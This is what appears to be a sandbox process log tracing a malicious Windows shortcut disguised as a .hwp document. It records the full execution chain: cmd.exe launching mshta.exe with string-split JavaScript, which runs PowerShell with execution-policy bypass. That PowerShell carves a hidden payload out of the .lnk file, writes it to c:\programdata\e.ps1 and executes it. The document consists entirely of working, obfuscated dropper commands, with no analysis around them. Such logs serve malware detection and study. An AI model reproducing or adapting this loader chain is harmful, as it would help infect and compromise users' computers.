cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "GQRGkj" C:\Users\test22\AppData\Local\Temp\20250402_62842.hwp.lnk
2544
mshta.exe "C:\Windows\System32\mshta.exe" javascript:a="pow"+"ershell -ep bypa"+"ss ";g="c:\\pro"+"gramdata\\";m=" -Encoding Byte;sc ";p="$w ([byte[]]($f "+"| select -Skip 0x0942)) -Force";s="a=new Ac"+"tiveXObject('WSc"+"ript.Shell');a.Run(c,0,true);close();";c=a+"-c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.co"+"unt -eq 0){$k=G"+"et-ChildItem $env:TEMP\\*\\*.l"+"nk | where-object{$_.length -eq $t};};$w='"+g+"e.ps1';$f=gc $k"+m+p+m+g+"4214 0;"+a+"-f $w;";eval(s);
2656
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -c $t=0x1a2b;$k = Get-ChildItem *.lnk | where-object {$_.length -eq $t} | Select-Object -ExpandProperty Name;if($k.count -eq 0){$k=Get-ChildItem $env:TEMP\*\*.lnk | where-object{$_.length -eq $t};};$w='c:\programdata\e.ps1';$f=gc $k -Encoding Byte;sc $w ([byte[]]($f | select -Skip 0x0942)) -Force -Encoding Byte;sc c:\programdata\4214 0;powershell -ep bypass -f $w;
2784
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -f c:\programdata\e.ps1
2892